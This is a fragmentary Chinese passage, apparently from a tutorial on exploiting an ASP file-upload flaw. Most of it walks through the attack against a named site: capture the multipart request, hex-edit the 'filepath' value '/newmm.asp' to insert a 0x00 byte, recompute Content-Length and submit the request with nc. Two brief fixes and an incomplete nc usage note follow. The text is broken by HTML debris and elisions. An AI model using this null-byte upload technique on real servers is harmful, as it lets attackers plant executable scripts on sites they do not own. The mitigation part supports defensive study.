../medias/myphoto/
-----------------------------7d423a138d0278
......

上传
---------------7d423a138d0278-----------------
二、

ultraedit 打开 1.txt 改数据：

......
-----------------------------7d423a138d0278
content-disposition:form-data;name="filepath"
/newmm.asp

█ <===这个黑色代表一个空格是 0x20,改成 0x00 就可以了

......
----------------------------
三、重新计算

cookies 长度,然后 nc 提交

nc-vv_blank>www.xin126.com80<1.txt

ultraedit 是一个 16 位编辑器网上可以下载得到
我们主要用来写那个结束标致

:====>16 位表示:0x00 或者 00h

其实你改的时候就直接再

filepath 的结尾处加个 00 就 ok 了

计算

cookies 长度===>你把 fillepath 改了之后、肯定是或＋或

—cookies 的长度变了

......
host:_blank>www.xin126.com
content-length:1969 <======就是这个
connection:keep-alive
cache-control:no-cache
......
计算会吧

?一个字母、数字就是 1

对于上传漏洞提出的解决思路

:(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理
===>我们的对策就是把 filepath 变成常量。。。
这个方法是目前最有效的

(我认为的)

2、加强对于的处理,原来我们是读到这里就结束
我们继续读直道下一个变量开始的地方，处理就

ok 了

附：

NCUsage:

监听外部主机
nc[-options]hostnameport[s][ports]...
监听本地主机